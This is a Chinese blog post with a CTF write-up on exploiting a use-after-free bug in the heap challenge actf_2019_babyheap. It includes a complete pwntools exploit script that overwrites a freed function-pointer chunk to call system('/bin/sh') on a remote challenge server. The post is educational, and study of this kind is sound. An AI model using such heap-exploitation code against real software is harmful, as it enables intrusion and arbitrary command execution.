linux_pwn(1)--uaf

已于 2022-03-04 18:02:02 修改
阅读量1.1k 收藏 2
点赞数 2
分类专栏: linux_pwn 文章标签: 安全
于 2022-03-04 16:02:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/123278645
版权

文章目录

What is uaf

use after free
一般可能会有以下的场景

ptr=malloc(0x10)
free(ptr)
ptr->

可能写代码不会出现这样的明显错误,但如果多文件呢?可能你这个地方释放了,其他地方还存在引用

所以项目中记住,free之后立刻ptr=NULL

pwn题

在ctf里面,一般uaf出题模式就是
在bss开辟了区域,保存了每个heap的地址,但是free之后没有清除
而这个时候题目里通常分为两个heap,一个是头里面保存了print函数地址和data heap地址,另一个就是data heap
而这个时候就要想办法让我们分配的data heap填在已经分配的heap里面

例题

actf_2019_babyheap
在这里插入图片描述
题目很简单,三个标签

add函数

这里面先分配了个0x21大小的头chunk,第一个保存的就是data chunk的地址,第二个是print函数
在这里插入图片描述

show函数

调用函数
在这里插入图片描述

delete函数

bss指针没有清空
在这里插入图片描述

开始做题

准备框架

作为新人,首先把框架摆好,就是每个题目的输入输出不一样,先写好

#! /usr/bin/python3
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcheronline

it = lambda: io.interactive()
ru = lambda x: io.recvuntil(x)
r = lambda x: io.recv(x)
rl = lambda: io.recvline()
s = lambda x: io.send(x)
sa = lambda x, y: io.sendafter(x, y)
sl = lambda x: io.sendline(x)
sla = lambda x, y: io.sendlineafter(x, y)


elf_path = "./ACTF_2019_babyheap_debug"
elf = ELF(elf_path)
context(arch=elf.arch, os="linux", log_level="debug")
if "debug" in elf_path:
    libc_path = elf.linker.decode().replace("ld", "./libc")
    libc = ELF(libc_path)
else:
    libc_path = ""


if len(sys.argv) > 1:
    remote_ip = "node4.buuoj.cn"
    remote_port = 29825
    io = remote(remote_ip, remote_port)
else:
    if libc_path != "":
        io = process(elf_path, env={"LD_PRELOAD": libc_path})
    else:
        io = process(elf_path)


def debug():
    gdbscript = """
        c
        x/5xg 0x602060
    """
    gdb.attach(io, gdbscript=gdbscript)


def add(size: int, content: bytes):
    sa(b"choice: ", b"1")
    sa(b"size: \n", str(size).encode())
    sa(b"content: ", content)



def show(index: int):
    sa(b"choice: ", b"3")
    sa(b"index: \n", str(index).encode())


def free(index: int):
    sa(b"choice: ", b"2")
    sa(b"index: \n", str(index).encode())

调试

add(0x20, b"0")
add(0x20, b"1")
free(1)
debug()
it()

先创建两个块,然后删除一个,看看结构
这里中间4个,0x21 0x31 0x21 0x31是我们创建的
在这里插入图片描述
这里打印了bss区,发现chunk地址没有清空
在这里插入图片描述

那我们想办法把data chunk安排起来

attack

其实很简单,因为fafstbin,tchar会最优匹配,也就是如果你需要的大小0x20可以满足并且有空余,他就不会去寻找更大的0x30之类

add(0x20, b"0")
add(0x20, b"1")
free(1)
free(0)
add(0x10, b"2")
debug()
it()

可以看到data分配到了本该是头的chunk,而且这个时候还准备指针引用
在这里插入图片描述
那么我们把这个chunk的数据指向/bin/sh,函数指向system的plt

exp

add(0x20, b"0")
add(0x20, b"1")
free(1)
free(0)
add(0x10, p64(0x602010) + p64(elf.plt["system"]))
show(1)
it()

修改端口 exp.py r打远程获取flag

总结

一般的简单的uaf比较简单
重要的思路就是把我们的可以写的data chunk覆盖到已经被free的保存函数的chunk位置即可
uaf漏洞就是告诉你,一定记得free之后把指针全部清空,因为你不知道你的指针指向的地方到底是什么内容

azraelxuemo
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
[CTF]PWN--堆--UAF漏洞
最新发布
2301_79880752的博客
03-08 1054
UAF即Use After Free简的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况。。而我们一般所指的漏洞主要是后两种。此外,
Linux: 记一次内核 UAF 问题解决过程
JiMoKuangXiangQu的专栏
07-15 956
linux, 调试, UAF(Use After Free)
Hacknote 一道简UAF漏洞题
红叶的博客
03-09 350
看了大佬们的WP两天,勉强搞懂了原理。如有任何错误请在评论区指出。
kernel pwn -- UAF
钞sir的博客
07-25 1万+
简介 众所周知,UAF的全称是Use After Free,是一种释放后重用漏洞;之前一直是在用户态下对这个漏洞进行利用学习的,最近想要体验一下在内核环境中利用此漏洞进行提权操作… 用户态的常规UAF可以看这篇文章… 这里我利用的CISCN2017 babydriver来进行学习的,环境我已经放到github上面了,需要的可以自行下载… 前置知识 权限 在Linux当中每个进程都有它自己的权限,而...
Linuxpwn从入门到放弃
热门推荐
一个码农的笔记
12-15 1万+
0x0 简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。 虽然web系统在互联网中占有比较大的分量,但是随着移动端,ioT的逐渐流行,传统的缓冲区溢出又一次有了用武之处 0x01 工欲善其事,必先利其器 Linux下的pwn常用到的工具有: (1)gdb:Linux调试中必要用到的 (2)gdb-peda:gdb方便调试的工具,类似的工具有gef,gd
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
CVE-2018-17182:Linux内核VMA-UAF提权突破(CVE-2018-17182),0天
03-20
CVE-2018-17182 Linux内核VMA-UAF提权突破(CVE-2018-17182) 关于 Google Project Zero的网络安全研究人员发布了详细信息,并针对自内核版本3.16至4.18.8以来Linux内核中存在的高严重性漏洞的概念验证(PoC)漏洞利用。 由白帽黑客Jann Horn发现,内核突破(CVE-2018-17182)是Linux内存管理磁盘中的缓存错误,导致释放后使用漏洞, 如果被利用,可能允许攻击者获得root权限目标系统上的特权。 免费使用后(UAF)攻击是一类内存损坏错误,非特权用户可利用这些错误来破坏或更改内存中的数据,从而导致拒绝服务(系统崩溃)或升级权限优先管理权限访问系统 Linux内核攻击于9月18日在oss-security邮件列表中公开,并在第二天在上游支持的稳定内核版本4.18.9,4.14.71,4.9.128和4.4.
pwn学习-ctfwiki-UAF
WocW的博客
05-23 2229
源码: #include <stdio.h> #include <stdlib.h> #include <unistd.h> struct note { void (*printnote)(); char *content; }; struct note *notelist[5]; int count = 0; void print_note_co...
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 311
这道题可以用来当做堆的入门题来做 开了NX 这是堆的菜;
linux内核pwn,Linux Kernel Pwn 学习笔记 (UAF)
weixin_39747087的博客
04-29 315
原标题:Linux Kernel Pwn 学习笔记 (UAF) 本文为看雪论坛优秀文章看雪论坛作者ID:Vinadiak0x01 背景知识UAF漏洞:UAF 漏洞是当我们 free 掉某个指针变量所指向的堆块的时候,未将该指针变量置0,导致该指针依然指着该堆块地址,当我们引用该指针的话,也就引用该指针所所指向的地址。这个漏洞对于开发者很容易忽略,但威力非常强大。条件竞争:在多线程的环境下,当多个线...
UAF原理与利用
B100dGh0st的博客
01-11 7548
0x00 UAF原理   如上代码所示,指针p1申请内存,打印其地址,值 然后释放p1 指针p2申请同样大小的内存,打印p2的地址,p1指针指向的值 Gcc编译,运行结果如下:   p1与p2地址相同,p1指针释放后,p2申请相同的大小的内存,操作系统会将之前给p1的地址分配给p2,修改p2的值,p1也被修改了。 由此我们可以知道: 1.在fr
linux uaf 漏洞利用,【技术分享】Linux内核音频子系统UAF内存漏洞(CVE-2017-15265)技术分析...
weixin_42353258的博客
05-17 178
0x00 事件描述2017 年 10 月 11 日,OSS 平台披露了 Linux 内核的snd_seq_ioctl_create_port()函数存在一处UAF(use-after-free)的内存漏洞(见[参考 1]),漏洞编号 CVE-2017-15265,漏洞报告者为“Michael23 Yu”,公告中并未给漏洞的影响程度如何。据悉,该漏洞需要攻击者拥有/dev/snd/seq目标设备的权...
Linux 二进制漏洞挖掘入门系列之(五)UAF 漏洞分析与利用
个人笔记
03-05 2269
UAF 0x10 UAF(Use After Free) 漏洞原理 这里,需要先介绍一下堆分配内存的原则。ptmalloc 是 glibc 的堆管理器,前身是 dlmallocLinux 中进程分配内存的两种方式:brk 和 mmap。当程序使用 malloc 申请内存的时候,如果小于 128K,使用 brk 方式,将数据段(.data)的最高地址指针_edata往高地址推;如果大于 128K...
linux内核申请堆,linux kernel pwn学习之UAF
weixin_29832179的博客
04-30 272
Linux Kernel UAF与用户态下的glibc差不多,都是对已经释放的空间未申请就直接使用,内核的UAF往往是出现在多线程多进程多文件的情况下。即,假如某个用户程序对用一个内核驱动文件打开了两次,有两个文件描述符,它们都指向了该驱动,又因为是在同一个程序里,所以当我们释放掉其中一个文件描述符后,还可以使用另一个文件描述符来操控驱动。为了加深理解,我们就以一题为例ciscn2017_baby...
linux_kernel_uaf漏洞利用实战
weixin_30666753的博客
08-03 395
前言 好像是国赛的一道题。一个 linux 的内核题目。漏洞比较简,可以作为入门。 题目链接: 在这里 正文 题目给了3个文件 分配是 根文件系统 , 内核镜像, 启动脚本。解压运行 boot.sh 即可。 vmware 需要开启一个选项。 使用 lsmod 可以找到加载的内核模块,以及它的加载地址。 多次启动发现,地址都没有变化,说明没有开启 kaslr ,从 boot.sh 中查看 q...
xdctf2015_pwn200
09-03
common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [xdctf2015_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值